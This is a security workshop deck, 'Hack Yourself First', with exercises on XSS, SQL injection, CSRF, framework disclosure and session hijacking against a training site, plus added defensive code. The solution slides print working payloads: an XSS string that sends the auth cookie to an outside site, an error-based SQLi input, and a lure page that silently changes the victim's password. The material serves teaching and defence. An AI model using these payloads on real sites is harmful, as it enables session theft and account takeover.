Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com
We're gonna turn you into lean, mean hacking machines!
Because if we don't, these kids are going to hack you
Jake Davies, 19 (and his mum)
Ryan Cleary, 20 (and his mum)
Curtis Gervais, 16, awaiting trial (probably with his mum)
Who are we protecting our assets from?
[chart: Hacker Competency (Bored kids, Common Thieves, Super Hackers) plotted against Hacker Resources (pocket money up to $10.8B per annum); those with resources can invest where ROI makes sense]
Your Hacker Tools for Today
A Wi-Fi connection
A mobile device you can configure a proxy on (I have a few spares)
Google Chrome, or another browser with good dev tools
Fiddler (getfiddler.com), or another HTTP proxy like charlesproxy.com
What we'll be covering
09:00 Introduction (30 mins)
09:30 Discovering risks via the browser (30 mins)
10:00 Using an HTTP proxy (30 mins)
10:30 Break (15 mins)
10:45 XSS (50 mins)
11:35 SQL injection (55 mins)
12:30 Lunch (1 hour)
13:30 Mobile APIs (60 mins)
14:30 CSRF (50 mins)
15:20 Break (15 mins)
15:35 Framework disclosure (30 mins)
16:05 Session hijacking (35 mins)
16:40 Wrap up (20 mins)
17:00 Close
Exercise 1 Discovering risks via the browser
Exercise 1: Chrome developer tools
Familiarise yourself with the dev tools: Elements, network, cookies, console, por uh, incognito
Create an account at hackyourselffirst.troyhunt.com
Hacker Challenge 1: Identify three security risks with the registration process
Exercise 2 Using an HTTP proxy
Exercise 2: Using an HTTP proxy
Familiarise yourself with Fiddler: watch requests and their headers, review response body and headers, use the composer to reissue requests
Hacker Challenge 2: Use Fiddler to vote multiple times on 1 car with your ID
Exercise 3 Reflected cross site scripting (XSS)
Understanding XSS
Template: <p>you searched for <%= Request.QueryString["q"] %></p>
Request: mysite.com/?q=ferrari
Response: <p>you searched for ferrari</p>
Request: mysite.com/?q=<script>alert('yay XSS!');</script>
Response: <p>you searched for <script>alert('yay XSS!');</script></p>
Some quick XSS tips
Check the encoding context: you encode for HTML differently than for JavaScript
Check the encoding consistency: often it's manual and some characters are not encoded
Play with JavaScript to manipulate the DOM, access cookies, load external resources
Exercise 3: XSS
Establish the encoding practices on the search page: what's encoded, what's not, which contexts are encoded for
What can be accessed or manipulated in the DOM
Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site
Exercise 3 solution http://hackyourselffirst.troyhunt.com/search?searchterm= ');document.location='http://www.troyhunt.com/?c='%2bdocument.cookie;//
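The two XSS tips above (encode per context, and encode consistently) are easiest to see in code. This is an added example, not code from the workshop or from the demo site: it assumes a search page that emits the term twice, once in the HTML body (as on the slide) and once inside an inline script, and applies a different encoder to each context. The vulnerable form of the template is kept beside the fixed one so the difference is visible.

```python
import html
import re

# Added example (not from the workshop slides): the same search term rendered
# into two output contexts with a context-specific encoder for each.
# The two-context template below is an assumption about what a search page
# might emit; the slide only shows the HTML <p> context.


def encode_for_html(value):
    """HTML body or attribute context: & < > " ' become entities."""
    return html.escape(value, quote=True)


def encode_for_js_string(value):
    """JavaScript string-literal context: every character outside
    [A-Za-z0-9] becomes \\xHH or \\uHHHH, so the value can neither close
    the quote nor emit a '</script>' that ends the block early."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append("\\x%02x" % cp)
        else:
            out.append("\\u%04x" % cp)
    return "".join(out)


def render_search_page(term, encode=True):
    """encode=False reproduces the slide's raw-concatenation bug in both
    contexts; encode=True applies the right encoder to each."""
    if encode:
        in_html, in_js = encode_for_html(term), encode_for_js_string(term)
    else:
        in_html = in_js = term
    return (
        "<p>you searched for %s</p>\n"
        "<script>var term = '%s';</script>" % (in_html, in_js)
    )


def script_openings(page):
    """Count '<script' openings; a correctly encoded page has exactly one."""
    return len(re.findall(r"<script\b", page, re.IGNORECASE))


def js_literal_is_intact(page):
    """True when the inline script's string literal contains no raw quote
    and no '</' (the two ways a term could escape that context)."""
    match = re.search(r"<script>var term = '(.*)';</script>\Z", page, re.S)
    return (match is not None
            and "'" not in match.group(1)
            and "</" not in match.group(1))


if __name__ == "__main__":
    term = "<script>alert('yay XSS!');</script>"   # the slide's own test string
    print(render_search_page(term, encode=False))
    print(render_search_page(term))
```

The point of the second encoder is consistency: `html.escape` leaves characters such as `)` and `;` alone because they are harmless in HTML, but inside a script string a single raw quote is enough, so the JavaScript context gets an encoder that allows only letters and digits through rather than a hand-picked list of "dangerous" characters.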
Exercise 4 SQL injection (SQLi)
Understanding SQLi
var query = "SELECT * FROM Widget WHERE Id = ";
query += Request.Query["id"];
Request: mysite.com/?id=1
Query: SELECT * FROM Widget WHERE Id = 1
Request: mysite.com/?id=foo
Query: SELECT * FROM Widget WHERE Id = foo
Result: Invalid column name 'foo'
Some quick SQLi tips
Think of SQL commands which disclose structure: sys.tables, sys.columns, system commands
Consider how you'd enumerate through records: select top x rows asc, then top 1 rows from that desc
Write out how you think the query works internally: SELECT * FROM Supercar ORDER BY [URL param]
Exercise 4: SQLi
Explore the database using error-based SQLi
Construct strings to disclose internal data
Cast things to invalid types to disclose via exceptions
Hacker Challenge 4: Discover the version of the DB
Exercise 4 solution http://hackyourselffirst.troyhunt.com/make/1?orderby=@@version*1
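The "Understanding SQLi" slide and the ORDER BY tip describe two different injection points, and they need two different fixes. This added example (mine, not the workshop's or the demo site's code) uses Python's built-in sqlite3 with a constructed Supercar table: the concatenated WHERE clause from the slide is shown beside a parameterised version, and the ORDER BY case, which cannot be parameterised, is handled with an allow-list of column names. The error text sqlite returns for `id=foo` is the same kind of structural disclosure the slide shows for SQL Server.

```python
import sqlite3

# Added example, not the workshop's code. Table contents are constructed.
ALLOWED_ORDER_BY = {"name": "Name", "votes": "Votes"}


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Supercar (Id INTEGER PRIMARY KEY, Name TEXT, Votes INTEGER)")
    con.executemany("INSERT INTO Supercar VALUES (?, ?, ?)",
                    [(1, "Veyron", 12), (2, "Aventador", 7), (3, "Huayra", 9)])
    return con


def lookup_concatenated(con, raw_id):
    """Vulnerable: mirrors the slide's query += Request.Query["id"].
    The engine's error message is returned to the caller, which is
    exactly what error-based SQLi reads back."""
    query = "SELECT Name FROM Supercar WHERE Id = " + raw_id
    try:
        return con.execute(query).fetchall()
    except sqlite3.Error as exc:
        return "error: " + str(exc)


def lookup_parameterised(con, raw_id):
    """Fixed: the value travels as a bound parameter, never as SQL text.
    Non-numeric input is rejected before the database ever sees it."""
    try:
        wanted = int(raw_id)
    except ValueError:
        return []
    return con.execute("SELECT Name FROM Supercar WHERE Id = ?", (wanted,)).fetchall()


def list_ordered(con, orderby):
    """ORDER BY takes an identifier, not a value, so it cannot be bound.
    Map the URL parameter onto a fixed set of column names instead."""
    column = ALLOWED_ORDER_BY.get(orderby.strip().lower())
    if column is None:
        raise ValueError("unsupported sort column")
    return [row[0] for row in con.execute("SELECT Name FROM Supercar ORDER BY " + column)]


if __name__ == "__main__":
    con = make_db()
    print(lookup_concatenated(con, "foo"))      # engine error text leaks out
    print(lookup_parameterised(con, "foo"))     # []
    print(list_ordered(con, "votes"))
```

Two things to take from it: the parameterised lookup turns `foo` into an empty result rather than an exception, so there is nothing for an error-based probe to learn; and for the ORDER BY parameter the only safe option is to refuse anything that is not one of the names you chose, which is why the `@@version*1` style of input in the solution above raises rather than reaching the database.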
Exercise 5 Mobile APIs
Understanding mobile APIs
Who are we protecting our APIs from?
[diagram: HTTP(S) traffic between the app and its API, with attackers shown on the path]
Trusting the Fiddler root cert http://ipv4.fiddler:8888
Some quick mobile API tips
Look at the HTTP requests for sensitive data: credentials, account info, PII
Remove the proxy's root cert and make HTTPS requests: is cert validation actually enabled in the app?
In your own apps: parameter tampering, auth bypass, direct object refs
Exercise 5: Mobile APIs
Proxy your device through Fiddler or Charles
Inspect the traffic of your apps: perform normal activities and monitor requests
Hacker Challenge 5: Find three things of interest (doesn't have to be security related)
Exercise 6 Cross site request forgery (CSRF)
Understanding CSRF
POST /Login/Account
Set-Cookie: AuthCookie=XXX
GET /Path/To/Authenticated/Resource (CSRF here!)
Cookie: AuthCookie=XXX (authenticated request!)
Some quick CSRF tips
Establish the request pattern to the target resource: what fields are being sent
Reconstruct the request from your own resource, normally a malicious page
Lure the user into the malicious resource: usually requires incentivisation
Exercise 6: CSRF
Mount your own CSRF attack: reproduce a legitimate request, use it to perform a malicious action
Hacker Challenge 6: Change the present user's password when they load your page
Exercise 6 solution
Exercise 6 solution
<html>
<head>
<title>win an iphone!!!</title>
</head>
<body style="text-align: center;">
<h1 style="font-size: 1.7em;">Want to win an iphone? Of course you do! Click the button below and it's yours!!!</h1>
<form action="https://hackyourselffirst.troyhunt.com/account/changepassword" method="post" target="hiddenframe">
<input type="hidden" name="newpassword" value="hackpword" />
<input type="hidden" name="confirmpassword" value="hackpword" />
<input type="submit" value="i wanna win!" onclick="alert('you won! Click ok and it\'s done')" style="font-size: 2em;" />
</form>
<p><img src="iphone.jpg" style="width: 900px;" /></p>
<iframe name="hiddenframe" style="display: none;"></iframe>
</body>
</html>
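The solution page works because the browser attaches the AuthCookie to the cross-site form post automatically, so the change-password handler cannot tell it from the site's own form. Below is an added example of the server-side check that closes that gap; it is my code, not the workshop's or the demo site's, and the session id, the signing key and the two request dictionaries are constructed for the example. It combines a session-bound anti-forgery token with an Origin check and, as the slide's form does, requires the two password fields to match.

```python
import hashlib
import hmac
import secrets

# Added example (not from the workshop or the demo site): an anti-forgery
# check for a change-password handler. Session id, key and the request
# dicts below are constructed for the example.

SITE_ORIGIN = "https://hackyourselffirst.troyhunt.com"
SERVER_KEY = secrets.token_bytes(32)   # per-process signing key (constructed)


def issue_csrf_token(session_id):
    """Token tied to the logged-in session; the site's own form embeds it
    as a hidden field, which a page on another origin cannot read."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers):
    """Origin (or, failing that, Referer) must be this site. A cross-site
    form post carries the victim's cookie but not this site's Origin."""
    lowered = {k.lower(): v for k, v in headers.items()}
    origin = lowered.get("origin") or lowered.get("referer", "")
    return origin == SITE_ORIGIN or origin.startswith(SITE_ORIGIN + "/")


def change_password_allowed(request, session_id):
    """Decide whether a POST to /account/changepassword may proceed.
    request = {"headers": {...}, "form": {...}}. The cookie is deliberately
    not consulted: the browser attaches it to forged requests too."""
    if not same_origin(request["headers"]):
        return False, "cross-origin request"
    form = request["form"]
    if not hmac.compare_digest(form.get("csrftoken", ""), issue_csrf_token(session_id)):
        return False, "missing or wrong anti-forgery token"
    if not form.get("newpassword") or form["newpassword"] != form.get("confirmpassword"):
        return False, "passwords missing or do not match"
    return True, "ok"


VICTIM_SESSION = "session-id-of-victim"   # constructed

# What the slide's "win an iphone" page submits: the browser adds the
# AuthCookie but sets Origin to the attacker's page, and no token is present.
FORGED_REQUEST = {
    "headers": {"Cookie": "AuthCookie=XXX", "Origin": "https://attacker.example"},
    "form": {"newpassword": "hackpword", "confirmpassword": "hackpword"},
}

# The site's own form: same origin and a token minted for this session.
LEGITIMATE_REQUEST = {
    "headers": {"Cookie": "AuthCookie=XXX", "Origin": SITE_ORIGIN},
    "form": {"newpassword": "hackpword", "confirmpassword": "hackpword",
             "csrftoken": issue_csrf_token(VICTIM_SESSION)},
}

if __name__ == "__main__":
    print(change_password_allowed(FORGED_REQUEST, VICTIM_SESSION))
    print(change_password_allowed(LEGITIMATE_REQUEST, VICTIM_SESSION))
```

The token check is the one that matters; the Origin check is cheap defence in depth for browsers that send the header. Deriving the token from the session id keeps the example short; a production implementation would store a random per-session value and compare against that.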
Exercise 7 Framework disclosure
Understanding framework disclosure risks
Learn of framework vulnerability -> Search web for vulnerable sites -> Pwn!
Some quick framework disclosure tips
There are multiple ways the framework is leaked; this can differ by web stack
Different requests can cause different leakage: consider the different ways in which a site may respond
Also think about other ways disclosure happens: markup structure, naming patterns, etc.
Exercise 7: Framework disclosure
Discover the internal framework of the site: identify what's being implicitly leaked
Cause the app to leak additional information
Hacker Challenge 7: Identify 3 different ways in which the internal framework is disclosed
Exercise 7 solution
1. Response headers (server, powered by, ASP.NET version, MVC version)
2. Unhandled exception stack trace (includes minor ASP.NET version)
3. Session ID cookie name (ASP.NET_SessionId)
4. Error page for 404 (includes minor ASP.NET version)
5. Elmah
6. HTTP fingerprinting
HTTP field ordering
Apache 1.3.23:
HTTP/1.1 200 OK
Date: Sun, 15 Jun 2003 17:10:49 GMT
Server: Apache/1.3.23
Last-Modified: Thu, 27 Feb 2003
ETag: "32417-c4-3e5d8a83"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/html
IIS 5.0:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://iis.example.com
Date: Fri, 01 Jan 1999 20:13:52 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Fri, 01 Jan 1999
ETag: W/"e0d362a4c335be1:ae1"
Content-Length: 133
Other fingerprinting indicators
Forbidden resource
Improper HTTP version
Improper protocol
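The two responses on the "HTTP field ordering" slide differ in the Server header value and also in where Date and Server sit, which is what field-order fingerprinting keys on. This added example (mine, not the workshop's) feeds those two slide responses through a small parser, shows the order-based guess and the explicit version disclosures, and then applies the defensive counterpart: strip the headers the exercise 7 solution lists (Server, X-Powered-By, X-AspNet-Version, X-AspNetMvc-Version) and emit the rest in a fixed order so the stack is no longer readable from either signal. Header names beyond those on the slide are the standard ASP.NET ones; which ones to drop is a configuration choice this example assumes.

```python
# Added example, not the workshop's code. The two sample responses are the
# ones printed on the "HTTP field ordering" slide.
APACHE_SAMPLE = """HTTP/1.1 200 OK
Date: Sun, 15 Jun 2003 17:10:49 GMT
Server: Apache/1.3.23
Last-Modified: Thu, 27 Feb 2003
ETag: "32417-c4-3e5d8a83"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/html"""

IIS_SAMPLE = """HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://iis.example.com
Date: Fri, 01 Jan 1999 20:13:52 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Fri, 01 Jan 1999
ETag: W/"e0d362a4c335be1:ae1"
Content-Length: 133"""

# Headers that name the stack or its version (the ASP.NET ones are the
# "server, powered by, ASP.NET version, MVC version" from the solution slide).
DISCLOSING = {"server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version"}


def parse_head(raw):
    """Split a response head into (status line, [(name, value), ...])."""
    lines = raw.strip().splitlines()
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def version_disclosures(headers):
    """Values of headers that state the product or version outright."""
    return [value for name, value in headers if name.lower() in DISCLOSING]


def guess_by_field_order(headers):
    """Order-only guess, ignoring header values, in the spirit of the slide:
    Apache 1.3 put Date before Server; IIS 5 led with Server."""
    names = [name.lower() for name, _ in headers]
    if names[:2] == ["date", "server"]:
        return "Apache-like (Date, then Server)"
    if names[:1] == ["server"]:
        return "IIS-like (Server first)"
    return "unknown"


def scrub(headers):
    """Defensive counterpart: drop disclosing headers and emit the rest in
    one canonical (alphabetical) order so field order stops being a tell."""
    kept = [(name, value) for name, value in headers if name.lower() not in DISCLOSING]
    return sorted(kept, key=lambda header: header[0].lower())


if __name__ == "__main__":
    for sample in (APACHE_SAMPLE, IIS_SAMPLE):
        _, hdrs = parse_head(sample)
        print(guess_by_field_order(hdrs), version_disclosures(hdrs))
        print(guess_by_field_order(scrub(hdrs)), version_disclosures(scrub(hdrs)))
```

Removing the Server header alone is not enough, which is the slide's point: the order of the remaining fields still identifies the product, so the rewrite has to happen at whatever layer emits the final response (a reverse proxy or the framework's response pipeline), not just by deleting one header.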
Exercise 8 Session hijacking
Understanding session hijacking
POST /Login/Account
Set-Cookie: AuthCookie=XXX
Attacker steals the cookie
Attacker issues authenticated request with the cookie
Some quick session hijacking tips
Persistence over HTTP can be done multiple ways: cookie, URL
Session or auth ID can be obtained multiple ways: insecure transport, referrer, stored in exceptions, XSS
Factors that limit hijacking: short duration expiry, keyed to client device / IP
Exercise 8: Session hijacking
Mount a session hijacking attack: identify how auth is being persisted, obtain the auth token using a vuln in the app
Hacker Challenge 8: Use an XSS risk to obtain the auth token and recreate the session in another browser
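Challenge 8 chains exercise 3 (XSS reads the cookie) into a replay from another browser, and the tips slide names the two limiting factors: short expiry and keying the session to the client. This added example (my code, not the workshop's or the demo site's) shows both, plus the cookie attributes that close the XSS path in the first place: an in-memory session store that binds each token to a client fingerprint and an absolute lifetime, a Set-Cookie builder that emits Secure, HttpOnly and SameSite, and a small audit function that reports which of those a given Set-Cookie value lacks. The session TTL, the choice of User-Agent plus IP as the client key, and the sample values are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
import time

# Added example, not the workshop's code. TTL and client-key recipe are
# assumptions for the example; a real deployment tunes both.
SESSION_TTL_SECONDS = 20 * 60            # short absolute lifetime
REQUIRED_FLAGS = {"secure": "Secure", "httponly": "HttpOnly", "samesite": "SameSite"}
_sessions = {}                           # token -> (client_key, expires_at)


def client_key(user_agent, ip):
    """Fingerprint the session is keyed to ("keyed to client device / IP")."""
    return hashlib.sha256(f"{user_agent}|{ip}".encode()).hexdigest()


def issue_session(user_agent, ip, now=None):
    """Mint an unguessable token and record who it was issued to and when it dies."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    _sessions[token] = (client_key(user_agent, ip), now + SESSION_TTL_SECONDS)
    return token


def set_cookie_header(token):
    """Cookie attributes: HttpOnly keeps document.cookie (the XSS payload's
    source) from reading it, Secure keeps it off plain HTTP, SameSite
    withholds it from cross-site requests, Max-Age matches the server TTL."""
    return (f"AuthCookie={token}; Path=/; Secure; HttpOnly; SameSite=Lax; "
            f"Max-Age={SESSION_TTL_SECONDS}")


def validate_session(token, user_agent, ip, now=None):
    """A stolen token replayed from another client, or after expiry, is rejected."""
    now = time.time() if now is None else now
    entry = _sessions.get(token)
    if entry is None:
        return False
    key, expires_at = entry
    if now >= expires_at:
        _sessions.pop(token, None)
        return False
    return hmac.compare_digest(key, client_key(user_agent, ip))


def missing_cookie_flags(set_cookie_value):
    """Audit a Set-Cookie value: which of Secure/HttpOnly/SameSite are absent."""
    attributes = {part.strip().split("=", 1)[0].lower()
                  for part in set_cookie_value.split(";")[1:]}
    return sorted(label for key, label in REQUIRED_FLAGS.items() if key not in attributes)


if __name__ == "__main__":
    print(missing_cookie_flags("AuthCookie=XXX"))          # the slide's bare cookie
    token = issue_session("Chrome", "10.0.0.1", now=1000)
    print(set_cookie_header(token))
    print(validate_session(token, "Chrome", "10.0.0.1", now=1100))    # True
    print(validate_session(token, "Firefox", "10.0.0.1", now=1100))   # False: other browser
```

Client binding is a limiting factor, as the slide says, not a guarantee: a User-Agent is trivially copied and mobile clients change IP, so the binding mostly raises the cost of the "recreate the session in another browser" step, while HttpOnly and a short lifetime are what actually shrink the window the stolen cookie is useful for.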